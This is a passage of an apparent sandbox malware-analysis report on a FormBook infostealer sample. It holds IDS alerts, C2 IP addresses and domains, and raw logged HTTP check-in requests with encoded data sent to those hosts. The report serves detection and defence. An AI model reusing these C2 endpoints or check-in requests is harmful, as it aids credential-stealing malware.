Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53633 -> 63.250.47.40:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53637 -> 91.184.0.200:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53616 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53652 -> 103.224.182.242:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53631 -> 63.250.47.40:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:53630 -> 217.70.184.50:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53649 -> 43.242.202.169:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:53614 -> 148.72.152.174:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53629 -> 217.70.184.50:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53635 -> 91.184.0.200:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53614 -> 148.72.152.174:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:53662 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53662 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53621 -> 172.191.244.62:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:53654 -> 103.224.182.242:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53617 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53654 -> 103.224.182.242:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53627 -> 217.70.184.50:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53630 -> 217.70.184.50:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:53642 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53672 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53663 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:53618 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53618 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53620 -> 172.191.244.62:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53665 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:53634 -> 63.250.47.40:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53642 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53634 -> 63.250.47.40:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53671 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:53674 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53628 -> 217.70.184.50:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53674 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:53626 -> 172.96.191.39:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53626 -> 172.96.191.39:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53632 -> 63.250.47.40:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53673 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:53638 -> 91.184.0.200:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:53650 -> 43.242.202.169:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53641 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53624 -> 172.96.191.39:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:53666 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53650 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53638 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53666 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:53622 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53622 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53647 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53639 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53668 -> 148.72.152.174:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53659 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53653 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53657 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53636 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:53670 -> 148.72.152.174:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53670 -> 148.72.152.174:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53651 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53667 -> 148.72.152.174:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53661 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53664 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53669 -> 148.72.152.174:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:53658 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53658 -> 85.159.66.93:80
            Source: Joe Sandbox ViewIP Address: 63.250.47.40
            Source: Joe Sandbox ViewIP Address: 13.248.169.48
            Source: Joe Sandbox ViewIP Address: 91.184.0.200
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS
            Source: Joe Sandbox ViewASN Name: AMAZON-02US
            Source: Joe Sandbox ViewASN Name: HOSTNETNL
            Source: Joe Sandbox ViewASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DECD62 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_00DECD62
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 18 Sep 2024 14:20:26 GMTserver: Apacheset-cookie: __tad=1726669226.5409498; expires=Sat, 16-Sep-2034 14:20:26 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 581content-type: text/html; charset=UTF-8connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 18 Sep 2024 14:20:29 GMTserver: Apacheset-cookie: __tad=1726669229.4590276; expires=Sat, 16-Sep-2034 14:20:29 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 581content-type: text/html; charset=UTF-8connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 18 Sep 2024 14:20:32 GMTserver: Apacheset-cookie: __tad=1726669232.6762876; expires=Sat, 16-Sep-2034 14:20:32 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 581content-type: text/html; charset=UTF-8connection: close
            Source: global trafficHTTP traffic detected: GET /2jit/?x0wHoJ8X=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1fIExehuCYopzYdrD7nSEUYrIRB0qkneaQhNiSOa9oBZv5w==&2VDlJ=Z2VdhTx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.elsupertodo.netConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /7xi5/?x0wHoJ8X=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELNT/uLCDt5nHY4Z1aiDsGH/lUra2tZ4EmQmJJAAh8o7sfXQ==&2VDlJ=Z2VdhTx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.omexai.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /fpzw/?2VDlJ=Z2VdhTx&x0wHoJ8X=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyV8YvjGskVquY7O4GS1YJERNPT4cclYTval7UCV/4UAiTeAA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.tekilla.wtfConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /3qit/?x0wHoJ8X=t3sSYQcRGIG2xp6lfBDs7+5agoifCQSrmgygjruUB9PzjWbyP4PTndkMOMUzUXzJWS/x79p8zVoA5FmvnGMYdT0P+5RUfPK3QBy2V8RIR3qX5RHElk5NoP1SAVBTInHq3g==&2VDlJ=Z2VdhTx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.bola88site.oneConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /nxfn/?2VDlJ=Z2VdhTx&x0wHoJ8X=6j3CvtUhPdUgNSN+xHguQlWnRKyrmKs9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVS2aVeWkTweCwbKJYJa5ZpRDYExluaviz3hCAwKYGhMeZlQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.languagemodel.proConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /3bdq/?x0wHoJ8X=mPDvA1qI3GiuntP+47r7UbinyaAdWbB61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4ExiUknvodE5HLMgr3NywByQXC4D0E63F2IS7XJBOJFBCzN3g==&2VDlJ=Z2VdhTx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.kexweb.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /ikh0/?2VDlJ=Z2VdhTx&x0wHoJ8X=lvx8xqKuEeZXr5IXmtDcOSOuXgPzygssZETVjxqXK0Zv2i3/Db6zT6O/acvvHmVSaGyiGmLaE43R+XLSCAO1jr66Q514zDlJHSMgPbfeUgvtl8EMtFUh5bwjyzdjbkT63w== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.jobworklanka.onlineConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /h7lb/?x0wHoJ8X=RbPHaORuq3VLsIvBIelJ5GO51GGMXVitxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0ZcwmkJbzyfd9szIIrZWt0fsPZoQH+Fzht72KOU0RGBuctA==&2VDlJ=Z2VdhTx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dyme.techConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /e0nr/?x0wHoJ8X=K/5K1kUHGJjjXPwyVklTimZmxQWW0oII6mASorW7taRlmnE0Vh93KWWTZt/v3aaqE5pW7Ym6hodTCoZ1X6txGVJXSKSxkKFGk1ZeWgOOIZqPnSDvoqvGMyEebPgjbI83mQ==&2VDlJ=Z2VdhTx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mizuquan.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /pp43/?x0wHoJ8X=/yzCblrJsERuqgzzvpbFhEZXPrEdROgu+6Zh8/8YqB01FuO+DLXfgclvHnt3CWNuGllXtp08GnLQKJ2iCtjVibvWBC9TblfPfUaDIhDj5FTVmS3R8lZAXA12CkSIDeX1TA==&2VDlJ=Z2VdhTx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.nobartv6.websiteConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /lrst/?x0wHoJ8X=mDrmkSN/AS2kB6l18epq8nmRkgENFEghmXXSSGppVfotDkdoE42/10NRLtLdcVyNlafsoPF4t6hSrFGriq6KQHyUFQSAc8UP525zlOX/aW9T9BNmWB7W/bov9uBpemVAjQ==&2VDlJ=Z2VdhTx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.sailnway.netConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /mquw/?2VDlJ=Z2VdhTx&x0wHoJ8X=9VhEAk+nBcRFJItebzuYkEWcWYPrTgvEZy86ZzmkaEauDk+ByEDFhBf1SE1efnbmII1/0Q2I2f54RFseImhioiSeit22xDiqKKd7jVQmz4n0QSDnRFZQupGXvMbNczsPDQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.chinaen.orgConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /f1gw/?x0wHoJ8X=pb7vAMGygCzgil6KiamfOy3VXzA3Xi9sLZv0yqE634qUaLHMRKan/u+F1ZY+Tt/oC7UdlvoT/RR8LwhbhdEc01iOVkBxCirsEav2yzLdi85bfi4XTpXBgVIAsk+0IqZz/w==&2VDlJ=Z2VdhTx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.study-in-nyc.onlineConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficDNS traffic detected: DNS query: www.woshop.online
            Source: global trafficDNS traffic detected: DNS query: www.kxshopmr.store
            Source: global trafficDNS traffic detected: DNS query: www.elsupertodo.net
            Source: global trafficDNS traffic detected: DNS query: www.omexai.info
            Source: global trafficDNS traffic detected: DNS query: www.tekilla.wtf
            Source: global trafficDNS traffic detected: DNS query: www.bola88site.one
            Source: global trafficDNS traffic detected: DNS query: www.languagemodel.pro
            Source: global trafficDNS traffic detected: DNS query: www.kexweb.top
            Source: global trafficDNS traffic detected: DNS query: www.jobworklanka.online
            Source: global trafficDNS traffic detected: DNS query: www.dyme.tech
            Source: global trafficDNS traffic detected: DNS query: www.arlon-commerce.com
            Source: global trafficDNS traffic detected: DNS query: www.mizuquan.top
            Source: global trafficDNS traffic detected: DNS query: www.nobartv6.website
            Source: global trafficDNS traffic detected: DNS query: www.sailnway.net
            Source: global trafficDNS traffic detected: DNS query: www.chinaen.org
            Source: global trafficDNS traffic detected: DNS query: www.study-in-nyc.online
            Source: unknownHTTP traffic detected: POST /7xi5/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Host: www.omexai.infoOrigin: http://www.omexai.infoContent-Type: application/x-www-form-urlencodedContent-Length: 209Connection: closeCache-Control: max-age=0Referer: http://www.omexai.info/7xi5/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Data Ascii: x0wHoJ8X=vzgY5DchbUTuDj4fU6YHupsGSPXmRFIgl5JAt+Mu7jLtHR577s0pgay7RHxaaQJVsBD1xGp+m6f/S65yCr8VZDvDDjHzj12CtboS8SwNecB747akbLotYQRoKWsOiroaGUZSlePOGWjy7ys5eNiGTqnn495rkwRe5CiWZP2aQuL6GwgZh15xpVWcHqYFITTVrQPByKY=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Wed, 18 Sep 2024 14:18:35 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Wed, 18 Sep 2024 14:18:38 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Wed, 18 Sep 2024 14:18:40 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Wed, 18 Sep 2024 14:18:43 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 18 Sep 2024 14:18:49 GMTserver: LiteSpeed Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 18 Sep 2024 14:18:52 GMTserver: LiteSpeed Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 18 Sep 2024 14:18:54 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 